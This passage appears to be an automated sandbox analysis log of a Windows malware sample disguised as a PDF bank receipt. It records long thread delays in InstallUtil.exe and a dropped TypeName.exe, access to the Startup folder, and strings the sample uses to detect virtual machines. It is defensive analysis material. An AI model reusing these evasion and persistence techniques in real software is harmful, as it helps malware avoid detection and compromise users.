              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -595195s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -595078s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -594969s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -594859s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -594750s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -594641s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -594531s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -594422s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exe TID: 3668Thread sleep count: 2506 > 30Jump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exe TID: 3668Thread sleep count: 1391 > 30Jump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exe TID: 320Thread sleep time: -11990383647911201s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exe TID: 320Thread sleep time: -100000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exe TID: 320Thread sleep time: -99875s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exe TID: 320Thread sleep time: -99766s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exe TID: 320Thread sleep time: -99656s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exe TID: 320Thread sleep time: -99547s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exe TID: 320Thread sleep time: -99438s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exe TID: 320Thread sleep time: -99313s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exe TID: 320Thread sleep time: -99188s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exe TID: 320Thread sleep time: -99063s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exe TID: 320Thread sleep time: -98953s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exe TID: 320Thread sleep time: -98844s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exe TID: 320Thread sleep time: -98719s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exe TID: 320Thread sleep time: -98609s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exe TID: 320Thread sleep time: -98500s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exe TID: 320Thread sleep time: -98390s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exe TID: 320Thread sleep time: -98281s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exe TID: 320Thread sleep time: -98170s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep count: 37 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -34126476536362649s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -599891s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 652Thread sleep count: 7252 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 652Thread sleep count: 2562 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -599781s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -599672s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -599559s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -599422s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -599308s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -599185s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -599078s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -598969s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -598844s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -598732s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -598625s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -598516s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -598407s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -598282s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -598157s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -598047s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -597938s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -597813s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -597688s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -597563s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -597438s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -597328s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -597219s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -597094s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -596985s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -596860s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -596735s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -596610s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -596485s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -596360s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -596235s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -596110s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -595985s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -595860s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -595735s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -595610s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -595485s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -595360s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -595235s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -595110s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -594985s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -594860s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -594735s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -594610s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -594485s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -594360s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -594235s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -594110s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeThread delayed: delay time: 100000Jump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeThread delayed: delay time: 99890Jump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeThread delayed: delay time: 99781Jump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeThread delayed: delay time: 99671Jump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeThread delayed: delay time: 99562Jump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeThread delayed: delay time: 99452Jump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeThread delayed: delay time: 99343Jump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeThread delayed: delay time: 99234Jump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeThread delayed: delay time: 99125Jump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeThread delayed: delay time: 99015Jump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeThread delayed: delay time: 98906Jump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeThread delayed: delay time: 98796Jump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeThread delayed: delay time: 98684Jump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeThread delayed: delay time: 98574Jump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeThread delayed: delay time: 98468Jump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeThread delayed: delay time: 98359Jump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeThread delayed: delay time: 98248Jump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeThread delayed: delay time: 98130Jump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeThread delayed: delay time: 97984Jump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeThread delayed: delay time: 97819Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599875Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599766Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599656Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599547Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599437Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599328Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599219Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599109Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598890Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598781Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598672Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598562Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598453Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598340Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598213Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598103Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597993Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597875Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597766Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597656Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597547Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597438Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597313Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597188Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597078Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596969Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596844Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596734Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596623Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596515Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596406Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596297Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596182Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596078Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595969Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595844Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595734Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595625Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595462Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595344Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595195Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595078Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594969Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594859Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594750Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594641Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594531Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594422Jump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeThread delayed: delay time: 100000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeThread delayed: delay time: 99875Jump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeThread delayed: delay time: 99766Jump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeThread delayed: delay time: 99656Jump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeThread delayed: delay time: 99547Jump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeThread delayed: delay time: 99438Jump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeThread delayed: delay time: 99313Jump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeThread delayed: delay time: 99188Jump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeThread delayed: delay time: 99063Jump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeThread delayed: delay time: 98953Jump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeThread delayed: delay time: 98844Jump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeThread delayed: delay time: 98719Jump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeThread delayed: delay time: 98609Jump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeThread delayed: delay time: 98500Jump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeThread delayed: delay time: 98390Jump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeThread delayed: delay time: 98281Jump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeThread delayed: delay time: 98170Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599891Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599781Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599672Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599559Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599422Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599308Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599185Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599078Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598969Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598844Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598732Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598625Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598516Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598407Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598282Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598157Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598047Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597938Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597813Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597688Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597563Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597438Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597328Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597219Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597094Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596985Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596860Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596735Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596610Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596485Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596360Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596235Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596110Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595985Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595860Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595735Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595610Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595485Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595360Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595235Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595110Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594985Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594860Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594735Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594610Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594485Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594360Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594235Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594110Jump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
              Source: TypeName.exe, 00000004.00000002.2181644021.000000000309C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
              Source: TypeName.exe, 00000004.00000002.2181644021.000000000309C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
              Source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2041086362.00000000011F2000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4476851419.0000000000D09000.00000004.00000020.00020000.00000000.sdmp, TypeName.exe, 00000004.00000002.2180142534.0000000001310000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4476075155.00000000016C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information queried: ProcessInformationJump to behavior
